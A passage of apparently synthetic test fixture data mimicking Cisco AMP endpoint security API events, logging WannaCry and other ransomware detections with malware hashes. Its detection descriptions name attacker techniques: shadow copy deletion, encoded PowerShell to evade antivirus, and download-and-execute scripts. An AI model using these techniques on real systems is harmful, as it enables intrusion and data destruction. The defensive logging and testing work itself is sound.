malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single 